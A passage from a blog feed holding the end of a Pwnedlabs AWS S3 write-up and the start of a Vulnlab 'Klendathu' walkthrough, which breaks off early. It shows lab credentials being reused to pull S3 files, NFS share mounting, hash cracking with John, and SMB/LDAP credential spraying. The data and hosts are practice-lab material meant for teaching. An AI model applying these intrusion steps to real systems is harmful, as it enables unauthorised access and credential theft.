class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration cat test-export.xml</span><br><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">CredentialsExport</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- Oracle Database Credentials --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">ServiceType</span>&gt;</span>Oracle Database<span class="tag">&lt;/<span class="name">ServiceType</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Hostname</span>&gt;</span>oracle-db-server02.prod.hl-internal.com<span class="tag">&lt;/<span class="name">Hostname</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Username</span>&gt;</span>admin<span class="tag">&lt;/<span class="name">Username</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Password</span>&gt;</span>Password123!<span class="tag">&lt;/<span class="name">Password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Notes</span>&gt;</span>Primary Oracle database for the financial application. Ensure strong password policy.<span class="tag">&lt;/<span class="name">Notes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- HP Server Credentials --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">ServiceType</span>&gt;</span>HP Server Cluster<span class="tag">&lt;/<span class="name">ServiceType</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Hostname</span>&gt;</span>hp-cluster1.prod.hl-internal.com<span class="tag">&lt;/<span class="name">Hostname</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Username</span>&gt;</span>root<span class="tag">&lt;/<span class="name">Username</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Password</span>&gt;</span>RootPassword456!<span class="tag">&lt;/<span class="name">Password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Notes</span>&gt;</span>HP server cluster for batch jobs. Periodically rotate this password.<span class="tag">&lt;/<span class="name">Notes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- AWS Production Credentials --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">ServiceType</span>&gt;</span>AWS IT Admin<span class="tag">&lt;/<span class="name">ServiceType</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">AccountID</span>&gt;</span>794929857501<span class="tag">&lt;/<span class="name">AccountID</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">AccessKeyID</span>&gt;</span>AKIA3[____]FWFGCD<span class="tag">&lt;/<span class="name">AccessKeyID</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">SecretAccessKey</span>&gt;</span>t21ERPmDq5[____]bnL4hY6jP<span class="tag">&lt;/<span class="name">SecretAccessKey</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Notes</span>&gt;</span>AWS credentials for production workloads. Do not share these keys outside of the organization.<span class="tag">&lt;/<span class="name">Notes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- Iron Mountain Backup Portal --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">ServiceType</span>&gt;</span>Iron Mountain Backup<span class="tag">&lt;/<span class="name">ServiceType</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">URL</span>&gt;</span>https://backupportal.ironmountain.com<span class="tag">&lt;/<span class="name">URL</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Username</span>&gt;</span>hladmin<span class="tag">&lt;/<span class="name">Username</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Password</span>&gt;</span>HLPassword789!<span class="tag">&lt;/<span class="name">Password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Notes</span>&gt;</span>Account used to schedule tape collections and deliveries. Schedule regular password rotations.<span class="tag">&lt;/<span class="name">Notes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- Office 365 Admin Account --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">ServiceType</span>&gt;</span>Office 365<span class="tag">&lt;/<span class="name">ServiceType</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">URL</span>&gt;</span>https://admin.microsoft.com<span class="tag">&lt;/<span class="name">URL</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Username</span>&gt;</span>admin@company.onmicrosoft.com<span class="tag">&lt;/<span class="name">Username</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Password</span>&gt;</span>O365Password321!<span class="tag">&lt;/<span class="name">Password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Notes</span>&gt;</span>Office 365 global admin account. Use for essential administrative tasks only and enable MFA.<span class="tag">&lt;/<span class="name">Notes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- Jira Admin Account --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">ServiceType</span>&gt;</span>Jira<span class="tag">&lt;/<span class="name">ServiceType</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">URL</span>&gt;</span>https://hugelogistics.atlassian.net<span class="tag">&lt;/<span class="name">URL</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Username</span>&gt;</span>jira_admin<span class="tag">&lt;/<span class="name">Username</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Password</span>&gt;</span>JiraPassword654!<span class="tag">&lt;/<span class="name">Password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Notes</span>&gt;</span>Jira administrative account. Restrict access and consider using API tokens where possible.<span class="tag">&lt;/<span class="name">Notes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">CredentialEntry</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">CredentialsExport</span>&gt;</span></span><br><span class="line"></span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>We can configure it again and check for any other interesting things.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws configure --profile it-admin</span><br><span class="line">AWS Access Key ID [None]: AKIA3S[____]FWFGCD</span><br><span class="line">AWS Secret Access Key [None]: t21ERPmDq[_____]lN9mAaJ0bnL4hY6jP</span><br><span class="line">Default region name [None]:</span><br><span class="line">Default output format [None]:</span><br><span class="line">➜  S3 enumeration aws sts get-caller-identity --profile it-admin</span><br><span class="line">&#123;</span><br><span class="line">    &quot;UserId&quot;: &quot;AIDA3SFMDAPOWKM6ICH4K&quot;,</span><br><span class="line">    &quot;Account&quot;: &quot;794929857501&quot;,</span><br><span class="line">    &quot;Arn&quot;: &quot;arn:aws:iam::794929857501:user/it-admin&quot;</span><br><span class="line">&#125;</span><br><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/admin/ --profile it-admin</span><br><span class="line">2023-10-16 20:38:38          0</span><br><span class="line">2023-10-16 20:40:51         32 flag.txt</span><br><span class="line">2024-02-17 12:21:11          0 test</span><br><span class="line">2023-10-17 01:54:07       2425 website_transactions_export.csv</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>And we got access to admin directory and our flag and <code>website_transactions_export.csv</code> file.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt ./ --profile it-admin</span><br><span class="line">download: s3://dev.huge-logistics.com/admin/flag.txt to ./flag.txt</span><br><span class="line">➜  S3 enumeration aws s3 cp s3://dev.huge-logistics.com/admin/website_transactions_export.csv ./ --profile it-admin</span><br><span class="line">download: s3://dev.huge-logistics.com/admin/website_transactions_export.csv to ./website_transactions_export.csv</span><br><span class="line">➜  S3 enumeration cat website_transactions_export.csv</span><br><span class="line">network,credit_card_number,cvv,expiry_date,card_holder_name,validation,username,password,ip_address</span><br><span class="line">Visa,4055497191304,386,5/2021,Hunter Miller,,hunter_m,password123,34.56.78.90</span><br><span class="line">Visa,4055491339081,492,8/2021,Jayden Adams,,jay_adams,jayden2023,157.89.34.56</span><br><span class="line">Visa,4055491511051,244,10/2025,Jose Baker,,joseBaker24,jose@pass,212.45.67.89</span><br><span class="line">Visa,4313504070320,984,3/2025,Gabriel Phillips,,gabrielP,welcome2025,58.67.34.23</span><br><span class="line">Visa,4313504750869252,522,5/2024,Joseph Thomas,,joethomas,joe!pass,94.23.45.67</span><br><span class="line">Visa,4313501801459893,585,5/2021,Chloe Nelson,,chloe_n,summer21,71.23.45.89</span><br><span class="line">Visa,4313506927832,748,4/2025,Brianna Brown,,briBrown,ilovebri,102.178.23.45</span><br><span class="line">Visa,4313508703687539,854,9/2021,Jose Perez,,jperez,jose*pass,145.89.23.67</span><br><span class="line">Visa,4055490538100206,903,2/2022,Brooklyn Davis,,brookD,cookie22,89.45.23.56</span><br><span class="line">Visa,4055496324021,989,10/2024,Elijah Davis,,elijahD2024,honey24,132.56.78.90</span><br><span class="line">Visa,4313507611385,798,10/2025,Jose Davis,,josed_25,chocolate,193.45.67.80</span><br><span class="line">Visa,4313505844566770,391,10/2023,Anna Miller,,annaM,anna2023,144.68.90.10</span><br><span class="line">Visa,4313503045245021,319,9/2022,Anthony Collins,,tony_collins,tony!pass,154.23.67.89</span><br><span class="line">Visa,4313503967294,839,7/2023,Alyssa Thompson,,alyssaT23,thompson23,212.67.89.90</span><br><span class="line">Visa,4055496654879978,242,10/2023,Gabriel Garcia,,garcia_gabe,letmein,148.12.67.34</span><br><span class="line">Visa,4313502893954,923,7/2025,Noah Allen,,noah_allen25,password2025,178.45.23.12</span><br><span class="line">Visa,4055497065912,770,9/2021,Hunter Anderson,,hunterA2021,winter21,165.89.34.12</span><br><span class="line">Visa,4055499869808,492,8/2025,David Jackson,,djackson,trustno1,194.56.78.90</span><br><span class="line">Visa,4055493603013,993,3/2023,Katherine Anderson,,kat_anderson,love2023,204.89.23.45</span><br><span class="line">Visa,4313507735369298,267,3/2021,Aiden Jones,,aidenJ,aiden@logistics,168.90.23.67</span><br><span class="line">Visa,4055490830817,631,1/2023,Etha Nelson,,ethaN,etha@2023,132.78.90.10</span><br><span class="line">Visa,4055492037879157,235,10/2024,Katherine Martin,,k_martin,superpass,178.89.23.45</span><br><span class="line">Visa,4055490511326,802,3/2025,Elijah Scott,,elijahS2025,summer25,212.34.56.78</span><br><span class="line">Visa,4313507927120,620,8/2022,Julia Brown,,juliaB22,julia@logis,189.23.45.67</span><br><span class="line">Visa,4055498615148980,916,4/2024,Jose Jones,,j_jones24,jose2024,178.56.78.90</span><br><span class="line">Visa,4313502314852,986,6/2024,Samantha Thompso,,samanthaT,samantha2024,167.89.90.12</span><br><span class="line">Visa,4055491551140558,357,2/2023,Elizabeth Nelson,,lizNelson,princess23,204.56.78.12</span><br><span class="line">Visa,4055496059868048,722,3/2025,Grace Brown,,graceB25,charlie1,156.78.90.12</span><br><span class="line">Visa,4313508490261548,894,7/2025,Landon Adams,,landonA,landon@logis,146.78.90.23%</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><h4 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h4><p>With escalated privileges, we accessed the admin directory, containing a flag and transaction data. This concluded our enumeration, highlighting the risks associated with misconfigured S3 permissions and the importance of securing sensitive files in cloud environments.</p>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Pwnedlabs" scheme="http://example.com/categories/Pwnedlabs/"/>
    
    
    <category term="AWS" scheme="http://example.com/tags/AWS/"/>
    
    <category term="Cloud" scheme="http://example.com/tags/Cloud/"/>
    
    <category term="Pwnedlabs" scheme="http://example.com/tags/Pwnedlabs/"/>
    
    <category term="AWS-Cli" scheme="http://example.com/tags/AWS-Cli/"/>
    
  </entry>
  
  <entry>
    <title>Klendathu Vulnlab</title>
    <link href="http://example.com/2024/11/01/Klendathu-Vulnlab/"/>
    <id>http://example.com/2024/11/01/Klendathu-Vulnlab/</id>
    <published>2024-11-01T15:59:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="Klendathu-Insane-Chain-Walkthrough"><a href="#Klendathu-Insane-Chain-Walkthrough" class="headerlink" title="Klendathu Insane Chain Walkthrough"></a>Klendathu Insane Chain Walkthrough</h1><p>Today will explore the <strong>insane Windows chain Klendathu</strong> from <a class="link"   href="https://www.vulnlab.com/" >Vulnlab<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>. This challenge consists of two Windows machines and one Linux machine, with the following IP addresses:</p><ul><li><code>10.10.137.37</code></li><li><code>10.10.137.38</code></li><li><code>10.10.137.39</code></li></ul><p>First we will perform an Nmap scan on each of these IPs to identify open ports and services running on them.</p><h2 id="Nmap-Scan"><a href="#Nmap-Scan" class="headerlink" title="Nmap Scan"></a>Nmap Scan</h2><p>After scanning 10.10.137.37, 10.10.137.38, 10.10.137.39 we got result as of below:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nmap -v -iL IPs</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.137.37</span><br><span class="line">Host is up (0.17s latency).</span><br><span class="line">Not shown: 990 closed tcp ports (reset)</span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">53/tcp   open  domain</span><br><span class="line">88/tcp   open  kerberos-sec</span><br><span class="line">135/tcp  open  msrpc</span><br><span class="line">139/tcp  open  netbios-ssn</span><br><span class="line">389/tcp  open  ldap</span><br><span class="line">445/tcp  open  microsoft-ds</span><br><span class="line">464/tcp  open  kpasswd5</span><br><span class="line">593/tcp  open  http-rpc-epmap</span><br><span class="line">636/tcp  open  ldapssl</span><br><span class="line">3389/tcp open  ms-wbt-server</span><br><span class="line"></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.137.38</span><br><span class="line">Host is up (0.16s latency).</span><br><span class="line">Not shown: 996 closed tcp ports (reset)</span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">135/tcp  open  msrpc</span><br><span class="line">139/tcp  open  netbios-ssn</span><br><span class="line">445/tcp  open  microsoft-ds</span><br><span class="line">3389/tcp open  ms-wbt-server</span><br><span class="line"></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.137.39</span><br><span class="line">Host is up (0.17s latency).</span><br><span class="line">Not shown: 997 closed tcp ports (reset)</span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">22/tcp   open  ssh</span><br><span class="line">111/tcp  open  rpcbind</span><br><span class="line">2049/tcp open  nfs</span><br><span class="line"></span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Nmap <span class="keyword">done</span>: 3 IP addresses (3 hosts up) scanned <span class="keyword">in</span> 24.83 seconds</span><br><span class="line">           Raw packets sent: 3189 (140.252KB) | Rcvd: 3229 (132.850KB)</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><h3 id="Accessing-the-NFS-Share-on-10-10-137-39"><a href="#Accessing-the-NFS-Share-on-10-10-137-39" class="headerlink" title="Accessing the NFS Share on 10.10.137.39"></a>Accessing the NFS Share on 10.10.137.39</h3><p>We identified port <strong>2049</strong> as open on the Linux machine with IP <code>10.10.137.39</code>. This port is typically used for NFS (Network File System), which allows remote file sharing. We checked for exported NFS shares</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu showmount -e 10.10.137.39</span><br><span class="line">/mnt/nfs_shares *</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p>Next, we created a directory to mount the NFS share locally:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu <span class="built_in">mkdir</span> share</span><br></pre></td></tr></table></figure></div><p>Mounted the NFS share to our local directory using the command:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu <span class="built_in">sudo</span> mount -t nfs 10.10.137.39:/mnt/nfs_shares /home/kali/Desktop/Vulnlab/klendathu/share</span><br></pre></td></tr></table></figure></div><p>We then navigated into the share directory:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu <span class="built_in">cd</span> share</span><br></pre></td></tr></table></figure></div><p>Inside the share directory, we found a file named Switch344_running-config.cfg:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  share <span class="built_in">ls</span></span><br><span class="line">Switch344_running-config.cfg</span><br></pre></td></tr></table></figure></div><p>To retrieve the configuration file, we copied it to our working directory:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  share <span class="built_in">cp</span> Switch344_running-config.cfg ../</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu <span class="built_in">cat</span> Switch344_running-config.cfg</span><br><span class="line">Switch344#show running-config</span><br><span class="line">Building configuration...</span><br><span class="line"></span><br><span class="line">Current configuration : 4716 bytes</span><br><span class="line">!</span><br><span class="line">version 12.2</span><br><span class="line">no service pad</span><br><span class="line">service timestamps debug datetime msec</span><br><span class="line">service timestamps <span class="built_in">log</span> datetime msec</span><br><span class="line">no service password-encryption</span><br><span class="line">!</span><br><span class="line">hostname Switch</span><br><span class="line">!</span><br><span class="line">boot-start-marker</span><br><span class="line">boot-end-marker</span><br><span class="line">!</span><br><span class="line"><span class="built_in">enable</span> secret 5 [............]</span><br><span class="line"><span class="built_in">enable</span> password C1sc0</span><br><span class="line">!</span><br><span class="line">no aaa new-model</span><br><span class="line">system mtu routing 1500</span><br><span class="line">ip subnet-zero</span><br><span class="line">!</span><br><span class="line">snmp-server community public RO </span><br><span class="line">snmp-server contact ZIM@KLENDATHU.VL</span><br><span class="line">!</span><br><span class="line">line con 0</span><br><span class="line">line vty 0 4</span><br><span class="line"> password 123456</span><br><span class="line"> login</span><br><span class="line">line vty 5 15</span><br><span class="line"> password 123456</span><br><span class="line"> login</span><br><span class="line">!</span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">Switch344#</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><h3 id="Cracking-the-Password-Hash"><a href="#Cracking-the-Password-Hash" class="headerlink" title="Cracking the Password Hash"></a>Cracking the Password Hash</h3><p>To crack the password hash obtained from the <code>Switch344_running-config.cfg</code>, we used John:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu john <span class="built_in">hash</span> --wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="line">Warning: detected <span class="built_in">hash</span> <span class="built_in">type</span> <span class="string">&quot;md5crypt&quot;</span>, but the string is also recognized as <span class="string">&quot;md5crypt-long&quot;</span></span><br><span class="line">Use the <span class="string">&quot;--format=md5crypt-long&quot;</span> option to force loading these as that <span class="built_in">type</span> instead</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">[........]       (?)     </span><br><span class="line">1g 0:00:00:00 DONE (2024-10-17 10:04) 7.142g/s 104228p/s 104228c/s 104228C/s mexico12..brandon123</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><h3 id="Authentication-Check-with-SMB-and-LDAP"><a href="#Authentication-Check-with-SMB-and-LDAP" class="headerlink" title="Authentication Check with SMB and LDAP"></a>Authentication Check with SMB and LDAP</h3><p>After cracking the password, we verified if the username and password were valid for SMB authentication across the available IPs.</p><h4 id="SMB-Authentication-Check"><a href="#SMB-Authentication-Check" class="headerlink" title="SMB Authentication Check"></a>SMB Authentication Check</h4><p>Using <code>nxc</code> to check SMB credentials:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nxc smb IPs -u users.txt -p pass.txt </span><br><span class="line">SMB         10.10.137.37    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.137.38    445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.137.37    445    DC1              [+] KLENDATHU.VL\zim:[........]</span><br><span class="line">SMB         10.10.137.38    445    SRV1             [+] KLENDATHU.VL\zim:[........]</span><br><span class="line">Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p>The credentials were successfully authenticated for both DC1 and SRV1.<br>Next, we checked the same credentials with LDAP:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nxc ldap IPs -u users.txt -p pass.txt</span><br><span class="line">SMB         10.10.137.38    445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">LDAP        10.10.137.38    389    SRV1             [-] KLENDATHU.VL\zim:[...] Error connecting to the domain, are you sure LDAP service is running on the target?</span><br><span class="line">Error: [Errno 111] Connection refused</span><br><span class="line">SMB         10.10.137.37    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">LDAP        10.10.137.37    389    DC1              [+] KLENDATHU.VL\zim:[........]</span><br><span class="line">Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p>The credentials were successfully authenticated via LDAP on DC1 but not on SRV1<br>Next, we dumped the BloodHound data using the valid credentials:</p><h4 id="Bloodhound-dump"><a href="#Bloodhound-dump" class="headerlink" title="Bloodhound dump"></a>Bloodhound dump</h4><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 